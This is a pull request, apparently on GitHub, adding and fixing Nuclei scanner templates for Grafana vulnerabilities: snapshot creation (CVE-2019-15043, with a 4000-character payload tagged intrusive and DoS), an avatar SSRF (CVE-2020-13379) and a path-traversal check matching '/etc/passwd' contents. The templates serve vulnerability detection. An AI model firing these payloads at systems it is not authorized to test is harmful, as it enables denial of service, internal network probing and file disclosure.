### PR TITLE
Grafana updates

### DIFF
--- a/cves/2019/CVE-2019-15043.yaml
+++ b/cves/2019/CVE-2019-15043.yaml
@@ -1,0 +1,39 @@
+id: CVE-2019-15043
+
+info:
+  name: Grafana 2.0.0 <= 6.3.3 Incorrect Access Control Vulnerability
+  author: Joshua Rogers
+  severity: high
+  description: Grafana is an open-source platform for monitoring and observability. In affected versions an attacker is able to delete and create arbitrary snapshots, leading to denial of service.
+  reference:
+    - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569
+    - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
+    - https://bugzilla.redhat.com/show_bug.cgi?id=1746945
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15043
+  remediation: Upgrade to 6.3.4 or higher.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+    cvss-score: 7.5
+    cve-id: CVE-2019-15043
+    cwe-id: CWE-284
+  metadata:
+    shodan-query: title:"Grafana"
+  tags: cve,cve2019,grafana
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/snapshots"
+
+    skip-variables-check: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 415
+
+      - type: word
+        words:
+          - "Content-Type"
+          - "ContentTypeError"
+        condition: and

--- a/cves/2019/CVE-2019-15043.yaml
+++ b/cves/2019/CVE-2019-15043.yaml
@@ -4,7 +4,8 @@ info:
   name: Grafana 2.0.0 <= 6.3.3 Incorrect Access Control Vulnerability
   author: Joshua Rogers
   severity: high
-  description: Grafana is an open-source platform for monitoring and observability. In affected versions an attacker is able to delete and create arbitrary snapshots, leading to denial of service.
+  description: |
+    Grafana is an open-source platform for monitoring and observability. In affected versions an attacker is able to delete and create arbitrary snapshots, leading to denial of service.
   reference:
     - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569
     - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
@@ -25,15 +26,14 @@ requests:
     path:
       - "{{BaseURL}}/api/snapshots"
 
-    skip-variables-check: true
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 415
-
       - type: word
         words:
           - "Content-Type"
           - "ContentTypeError"
         condition: and
+
+      - type: status
+        status:
+          - 415

--- a/cves/2019/CVE-2019-15043.yaml
+++ b/cves/2019/CVE-2019-15043.yaml
@@ -10,6 +10,7 @@ info:
     - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569
     - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
     - https://bugzilla.redhat.com/show_bug.cgi?id=1746945
+    - https://aaron-hoffmann.com/posts/cve-2019-15043/
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15043
   remediation: Upgrade to 6.3.4 or higher.
   classification:
@@ -18,22 +19,37 @@ info:
     cve-id: CVE-2019-15043
     cwe-id: CWE-284
   metadata:
+    verified: "true"
     shodan-query: title:"Grafana"
-  tags: cve,cve2019,grafana
+  tags: cve,cve2019,grafana,dos,intrusive
+
+variables:
+  payload: '{{repeat("A", 4000)}}'
 
 requests:
   - method: POST
     path:
       - "{{BaseURL}}/api/snapshots"
+    headers:
+      Content-Type: application/json
+    body: '{"dashboard": {"name":"{{payload}}"}}'
 
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
-          - "Content-Type"
-          - "ContentTypeError"
+          - '"deleteUrl":'
+          - '"deleteKey":'
+          - '"key":'
+          - '"url":'
         condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
 
       - type: status
         status:
-          - 415
+          - 200

--- a/cves/2020/CVE-2020-11110.yaml
+++ b/cves/2020/CVE-2020-11110.yaml
@@ -1,7 +1,7 @@
 id: CVE-2020-11110
 
 info:
-  name: Grafana <=6.7.1 - Cross-Site Scripting
+  name: Grafana <= 6.7.1 - Cross-Site Scripting
   author: emadshanab
   severity: medium
   description: Grafana through 6.7.1 contains an unauthenticated stored cross-site scripting vulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.

--- a/cves/2020/CVE-2020-13379.yaml
+++ b/cves/2020/CVE-2020-13379.yaml
@@ -4,7 +4,8 @@ info:
   name: Grafana 3.0.1 <= 7.0.1 Server Side Request Forgery
   author: Joshua Rogers
   severity: high
-  description: The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue that allows remote code execution. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client. This can be used to gain information about the network that Grafana is running on.
+  description: |
+    The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue that allows remote code execution. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client. This can be used to gain information about the network that Grafana is running on.
   reference:
     - https://github.com/advisories/GHSA-wc9w-wvq2-ffm9
     - https://nvd.nist.gov/vuln/detail/CVE-2020-13379

--- a/cves/2020/CVE-2020-13379.yaml
+++ b/cves/2020/CVE-2020-13379.yaml
@@ -26,7 +26,6 @@ requests:
     path:
       - "{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"
 
-    skip-variables-check: true
     matchers-condition: and
     matchers:
       - type: word

--- a/cves/2020/CVE-2020-13379.yaml
+++ b/cves/2020/CVE-2020-13379.yaml
@@ -28,12 +28,18 @@ requests:
     skip-variables-check: true
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
       - type: word
+        part: body
         words:
           - "cloudflare.com"
           - "dns"
         condition: and
+
+      - type: word
+        part: header
+        words:
+          - "image/jpeg"
+
+      - type: status
+        status:
+          - 200

--- a/cves/2020/CVE-2020-13379.yaml
+++ b/cves/2020/CVE-2020-13379.yaml
@@ -1,0 +1,39 @@
+id: CVE-2020-13379
+
+info:
+  name: Grafana 3.0.1 <= 7.0.1 Server Side Request Forgery
+  author: Joshua Rogers
+  severity: high
+  description: The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue that allows remote code execution. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client. This can be used to gain information about the network that Grafana is running on.
+  reference:
+    - https://github.com/advisories/GHSA-wc9w-wvq2-ffm9
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-13379
+    - https://github.com/grafana/grafana/commit/ba953be95f0302c2ea80d23f1e5f2c1847365192
+  remediation: Upgrade to 6.3.4 or higher.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
+    cvss-score: 8.2
+    cve-id: CVE-2020-13379
+    cwe-id: CWE-918
+  metadata:
+    shodan-query: title:"Grafana"
+  tags: cve,cve2020,grafana,ssrf
+
+requests:
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"
+
+    skip-variables-check: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "cloudflare.com"
+          - "dns"
+        condition: and

--- a/cves/2020/CVE-2020-13379.yaml
+++ b/cves/2020/CVE-2020-13379.yaml
@@ -17,6 +17,7 @@ info:
     cve-id: CVE-2020-13379
     cwe-id: CWE-918
   metadata:
+    verified: "true"
     shodan-query: title:"Grafana"
   tags: cve,cve2020,grafana,ssrf
 

--- a/exposed-panels/grafana-detect.yaml
+++ b/exposed-panels/grafana-detect.yaml
@@ -27,6 +27,6 @@ requests:
         part: body
         group: 1
         regex:
-          - 'Grafana ([v0-9.]+)'
+          - '\"version\"\:\"([0-9.]+)\"}'
 
 # Enhanced by md on 2022/11/16

--- a/vulnerabilities/grafana/grafana-file-read.yaml
+++ b/vulnerabilities/grafana/grafana-file-read.yaml
@@ -18,7 +18,7 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cwe-id: CWE-22
-  tags: grafana,lfi
+  tags: grafana,lfi,fuzz
 
 requests:
   - method: GET
@@ -32,7 +32,6 @@ requests:
     stop-at-first-match: true
     matchers-condition: and
     matchers:
-
       - type: regex
         regex:
           - "root:.*:0:0:"

--- a/vulnerabilities/grafana/grafana-file-read.yaml
+++ b/vulnerabilities/grafana/grafana-file-read.yaml
@@ -17,6 +17,7 @@ info:
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
+    cve-id: CVE-2021-43798
     cwe-id: CWE-22
   tags: grafana,lfi
 

--- a/vulnerabilities/grafana/grafana-file-read.yaml
+++ b/vulnerabilities/grafana/grafana-file-read.yaml
@@ -18,7 +18,7 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cwe-id: CWE-22
-  tags: grafana,lfi,fuzz
+  tags: grafana,lfi
 
 requests:
   - method: GET


### PR DESCRIPTION
### Template / PR Information

CVE-2020-13379 and CVE-2019-15043 are two common Grafana vulnerabilities with easy-to-exploit PoCs and IoVs. I have added them to Nuclei.

grafana-file-red.yaml has since May been broken, causing Grafana to skip it. I've fixed the issue (extraneous tag). Maybe this should be fixed in Nuclei instead, but for the time being, I have updated the template since "fuzz" is not an appropriate tag, anyway. I have created an issue about this problem here: https://github.com/projectdiscovery/nuclei/issues/2994.

- Added CVE-2020-13379, CVE-2019-15043.
- Fixed grafana-file-read.yaml, which since May (in https://github.com/projectdiscovery/nuclei-templates/pull/4469) could not be loaded.

### Template Validation

I've validated this template locally?
- YES

#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)